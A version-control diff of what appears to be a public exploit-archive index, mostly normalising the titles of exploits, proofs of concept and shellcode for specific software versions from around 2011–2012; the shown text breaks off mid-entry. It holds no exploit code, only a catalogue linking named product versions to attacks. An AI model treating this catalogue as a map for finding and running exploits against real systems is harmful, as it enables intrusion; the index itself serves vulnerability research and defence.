-17948,platforms/windows/remote/17948.rb,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST)",2011-10-09,metasploit,windows,remote,0 +17948,platforms/windows/remote/17948.rb,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,metasploit,windows,remote,0 17949,platforms/php/webapps/17949.rb,"myBB 1.6.4 Backdoor Exploit",2011-10-09,metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 @@ -15611,7 +15606,7 @@ id,file,description,date,author,platform,type,port 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability",2011-10-11,metasploit,windows,local,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0 -17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0 +17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0 17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin <= 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 @@ -15658,7 +15653,7 @@ id,file,description,date,author,platform,type,port 18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0 18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component SQL Injection Vulnerability",2011-10-28,"Chris Russell",php,webapps,0 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - DoS (PoC)",2011-10-28,loneferret,windows,dos,0 -18068,platforms/hardware/remote/18068.rb,"LifeSize Room Command Injection",2011-11-02,metasploit,hardware,remote,0 +18068,platforms/hardware/remote/18068.rb,"LifeSize Room - Command Injection (Metasploit)",2011-11-02,metasploit,hardware,remote,0 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change PoC",2011-10-28,vladz,linux,local,0 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",2011-10-24,metasploit,windows,local,0 @@ -15702,9 +15697,9 @@ id,file,description,date,author,platform,type,port 18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 -18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit",2011-11-04,metasploit,windows,local,0 +18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (3)",2011-11-04,metasploit,windows,local,0 18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 -18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 +18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Local Root",2011-11-05,zx2c4,linux,local,0 18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,metasploit,windows,local,0 @@ -15756,7 +15751,7 @@ id,file,description,date,author,platform,type,port 18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0 18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 -18149,platforms/php/webapps/18149.php,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-11-23,EgiX,php,webapps,0 +18149,platforms/php/webapps/18149.php,"PmWiki <= 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (1)",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion Vulnerability",2011-11-24,"Akin Tosunlar",cgi,webapps,0 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 @@ -15821,9 +15816,9 @@ id,file,description,date,author,platform,type,port 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 -18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0 +18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit (Metasploit)",2011-12-13,metasploit,php,webapps,0 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0 -18243,platforms/php/webapps/18243.rb,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-12-14,metasploit,php,webapps,0 +18243,platforms/php/webapps/18243.rb,"PmWiki <= 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (2)",2011-12-14,metasploit,php,webapps,0 18246,platforms/php/webapps/18246.txt,"Seotoaster SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection Vulnerability",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 18248,platforms/php/webapps/18248.pl,"mPDF <= 5.3 File Disclosure",2011-12-16,ZadYree,php,webapps,0 @@ -15915,18 +15910,18 @@ id,file,description,date,author,platform,type,port 18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0 18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0 18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 -18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0 +18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH) (Metasploit)",2012-01-17,metasploit,windows,local,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,metasploit,windows,remote,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability",2012-01-14,metasploit,windows,remote,0 18366,platforms/windows/local/18366.rb,"Adobe Reader U3D Memory Corruption Vulnerability",2012-01-14,metasploit,windows,local,0 18367,platforms/windows/remote/18367.rb,"XAMPP WebDAV PHP Upload",2012-01-14,metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,linux,remote,0 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,bsd,remote,0 -18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 mChannel use after free Vulnerability",2012-01-17,metasploit,osx,remote,0 +18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel use after free Vulnerability (2)",2012-01-17,metasploit,osx,remote,0 18378,platforms/linux/dos/18378.c,"Linux IGMP Remote Denial of Service (Introduced in linux-2.6.36)",2012-01-17,kingcope,linux,dos,0 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 Search For php/html Writable Files and Add Your Code",2012-01-17,rigan,lin_x86,shellcode,0 18380,platforms/php/webapps/18380.txt,"Joomla Discussions Component (com_discussions) SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0 -18975,platforms/php/webapps/18975.rb,"Log1 CMS writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0 +18975,platforms/php/webapps/18975.rb,"Log1 CMS - writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0 18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,metasploit,windows,remote,0 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0 @@ -15938,7 +15933,7 @@ id,file,description,date,author,platform,type,port 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 - 3.6.2 - Persistent EventHandler XSS",2012-01-19,MaXe,php,webapps,0 18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post <= 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18392,platforms/php/webapps/18392.php,"appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 +18392,platforms/php/webapps/18392.php,"appRain CMF <= 0.1.5 - (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 18393,platforms/linux/remote/18393.rb,"Gitorious Arbitrary Command Execution",2012-01-20,metasploit,linux,remote,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance Authentication Bypass Vulnerability",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage SQL Injection Vulnerability",2012-01-20,"Red Security TEAM",asp,webapps,0 @@ -16010,7 +16005,7 @@ id,file,description,date,author,platform,type,port 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 - File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,metasploit,windows,remote,0 -18479,platforms/windows/remote/18479.rb,"Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,metasploit,windows,remote,0 +18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,metasploit,windows,remote,0 18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 - Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - (LFI/XSS) Multiple Vulnerabilities",2012-02-12,"Avram Marius",php,webapps,0 @@ -16033,7 +16028,7 @@ id,file,description,date,author,platform,type,port 18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS CSRF Change Admin Password",2012-02-21,"Ivano Binetti",hardware,webapps,0 18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 - CSRF Vulnerability (ADSL Router)",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 -18563,platforms/php/webapps/18563.txt,"forkcms 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 +18563,platforms/php/webapps/18563.txt,"ForkCMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 18506,platforms/php/webapps/18506.txt,"BRIM < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin Command Line Argument Injection (2012)",2012-02-24,metasploit,windows,remote,0 18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 @@ -16312,7 +16307,7 @@ id,file,description,date,author,platform,type,port 18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - (.gpx) Crash PoC",2012-05-09,condis,windows,dos,0 18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid ActiveX Control RCE",2012-05-09,"Francis Provencher",windows,dos,0 18853,platforms/windows/dos/18853.txt,"SAP Netweaver Dispatcher - Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 -18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 Spam Logging PHP Injection",2012-05-12,metasploit,php,webapps,0 +18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 - Spam Logging PHP Injection",2012-05-12,metasploit,php,webapps,0 18855,platforms/linux/dos/18855.txt,"Asterisk 'ast_parse_digest()' Stack Buffer Overflow Vulnerability",2012-03-15,"Russell Bryant",linux,dos,0 18857,platforms/php/webapps/18857.txt,"Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure",2012-05-10,"Andrey Komarov",php,webapps,0 18858,platforms/php/webapps/18858.txt,"elearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 @@ -16350,11 +16345,11 @@ id,file,description,date,author,platform,type,port 18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18913,platforms/php/webapps/18913.php,"Supernews <= 2.6.1 - SQL Injection Exploit",2012-05-21,WhiteCollarGroup,php,webapps,0 -18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",2012-05-21,metasploit,windows,local,0 +18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow",2012-05-21,metasploit,windows,local,0 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation Exploit",2012-05-22,sickness,windows,local,0 18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent XSS",2012-05-18,"Henry Hoggard",php,webapps,0 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager lmgrd Buffer Overflow",2012-05-23,metasploit,windows,remote,0 -18922,platforms/php/webapps/18922.rb,"appRain CMF Arbitrary PHP File Upload Vulnerability",2012-05-25,metasploit,php,webapps,0 +18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary PHP File Upload Vulnerability",2012-05-25,metasploit,php,webapps,0 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x & Symantec Network Access Control 11.x LCE PoC",2012-05-23,41.w4r10r,windows,dos,0 18917,platforms/linux/local/18917.txt,"Mod_Auth_OpenID Session Stealing Vulnerability",2012-05-24,"Peter Ellehauge",linux,local,0 18918,platforms/multiple/dos/18918.txt,"Wireshark DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 @@ -16367,7 +16362,7 @@ id,file,description,date,author,platform,type,port 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,metasploit,windows,remote,0 18950,platforms/php/webapps/18950.txt,"NewsAdd <= 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 18931,platforms/ios/dos/18931.rb,"iOS <= 5.1.1 - Safari Browser - JS match() & search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0 -18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal Vulnerability",2012-05-27,metasploit,windows,remote,0 +18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal Vulnerability (2)",2012-05-27,metasploit,windows,remote,0 18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",2012-05-28,metasploit,linux,remote,0 @@ -16380,7 +16375,7 @@ id,file,description,date,author,platform,type,port 18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 18947,platforms/windows/local/18947.rb,"ispVM System XCF File Handling Overflow",2012-05-29,metasploit,windows,local,0 18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injection Vulnerabilities",2012-05-29,loneferret,php,webapps,0 -19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog Buffer Overflow 2.07.14",2012-06-08,metasploit,windows,remote,0 +19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Buffer Overflow",2012-06-08,metasploit,windows,remote,0 18952,platforms/windows/dos/18952.txt,"Microsoft Wordpad 5.1 - (.doc) Null Pointer Dereference Vulnerability",2012-05-30,condis,windows,dos,0 18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 18954,platforms/windows/local/18954.rb,"MPlayer SAMI Subtitle File Buffer Overflow",2012-05-30,metasploit,windows,local,0 @@ -16466,7 +16461,7 @@ id,file,description,date,author,platform,type,port 19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 19067,platforms/irix/local/19067.txt,"SGI IRIX <= 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT Vulnerability",1996-11-22,"Yuri Volobuev",irix,local,0 -19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-11,"Florent Daigniere",hardware,dos,0 +19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass Vulnerability (1)",2012-06-11,"Florent Daigniere",hardware,dos,0 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,metasploit,php,webapps,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability",1998-04-06,"ru5ty and SoReN",unix,local,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow Vulnerability",1998-04-14,"Netstat Webmaster",linux,remote,0 @@ -16489,7 +16484,7 @@ id,file,description,date,author,platform,type,port 19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2 & SCO Open Server <= 5.0.5 & ProFTPD 1.2 pre1 - realpath Vulnerability (1)",1999-02-09,"smiler and cossack",linux,remote,21 19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2 & SCO Open Server <= 5.0.5 & ProFTPD 1.2 pre1 - realpath Vulnerability (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format DoS Exploit",2012-06-12,Cr4sh,windows,dos,0 -19091,platforms/hardware/remote/19091.py,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 +19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Remote Root Authentication Bypass Vulnerability (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 19092,platforms/multiple/remote/19092.py,"MySQL Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server <= 4.0 - Remote File Display / Deletion / Upload / Execution Vulnerability",1998-12-25,rain.forest.puppy,multiple,remote,0 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4.0/5.0 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access Vulnerability",1999-04-22,"Georgi Guninsky",windows,remote,0 @@ -16605,7 +16600,7 @@ id,file,description,date,author,platform,type,port 19216,platforms/aix/local/19216.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 19217,platforms/aix/local/19217.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (5)",1999-05-22,UNYUN,aix,local,0 19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U 2.5 - Buffer Overflow Vulnerabilities",1999-05-03,"Arne Vidstrom",linux,remote,0 -19219,platforms/linux/remote/19219.c,"bisonware bisonware ftp server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 +19219,platforms/linux/remote/19219.c,"BisonWare BisonWare FTP Server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server <= 4.0.1 - CFCRYPT.EXE Vulnerability",1998-05-19,"Matt Chapman",windows,local,0 19221,platforms/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Buffer Overflow Vulnerability",1999-05-25,cmart,multiple,remote,0 19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 @@ -16777,7 +16772,7 @@ id,file,description,date,author,platform,type,port 19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 19403,platforms/php/webapps/19403.rb,"SugarCRM <= 6.3.1 unserialize() PHP Code Execution",2012-06-26,metasploit,php,webapps,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service Vulnerability",2006-11-15,"Evgeny Legerov",windows,dos,0 -19409,platforms/windows/dos/19409.txt,"sielco sistemi winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 +19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 19414,platforms/windows/dos/19414.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 (2)",1999-07-03,klepto,windows,dos,0 19415,platforms/windows/dos/19415.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 (3)",1999-04-06,"Rob Mosher",windows,dos,0 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS Vulnerability",1999-07-06,"Arne Vidstrom",windows,dos,0 @@ -16790,7 +16785,7 @@ id,file,description,date,author,platform,type,port 19423,platforms/multiple/dos/19423.c,"Linux Kernel <= 2.3 (BSD/OS <= 4.0 / FreeBSD <= 3.2 / NetBSD <= 1.4) - Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0 19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1)",1999-07-19,"rain forest puppy",windows,remote,0 19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 -19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0_SGI IRIX <= 6.5.4_SGI UNICOS <= 10.0 6 arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0 +19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0_SGI IRIX <= 6.5.4_SGI UNICOS <= 10.0 6 - arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0 19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 Vulnerability",1999-05-13,"Tim Conrad",osx,local,0 19428,platforms/linux/local/19428.c,"Samba Pre-2.0.5 Vulnerabilities",1999-07-21,"Gerald Britton",linux,local,0 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 ClearCase SUID Vulnerability",1999-05-02,Mudge,linux,local,0 @@ -16994,7 +16989,7 @@ id,file,description,date,author,platform,type,port 19626,platforms/php/webapps/19626.txt,"sflog! <= 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 -19630,platforms/php/webapps/19630.rb,"Tiki Wiki <= 8.3 unserialize() PHP Code Execution",2012-07-09,metasploit,php,webapps,0 +19630,platforms/php/webapps/19630.rb,"Tiki Wiki <= 8.3 - unserialize() PHP Code Execution",2012-07-09,metasploit,php,webapps,0 19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 diff.php Arbitrary Command Execution",2012-07-09,metasploit,php,webapps,0 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver Vulnerability",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19633,platforms/windows/local/19633.txt,"Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 @@ -17073,7 +17068,6 @@ id,file,description,date,author,platform,type,port 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS Vulnerability",2000-01-05,"Ussr Labs",windows,dos,0 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE Vulnerability",2000-01-04,anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal Vulnerability",2000-01-03,"k0ad k1d",cgi,remote,0 -19714,platforms/php/webapps/19714.txt,"Netsweeper WebAdmin Portal - Multiple Vulnerabilities",2012-07-10,"Jacob Holcomb",php,webapps,0 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0 @@ -17516,10 +17510,10 @@ id,file,description,date,author,platform,type,port 20182,platforms/windows/remote/20182.txt,"Ipswitch IMail 6.x File Attachment 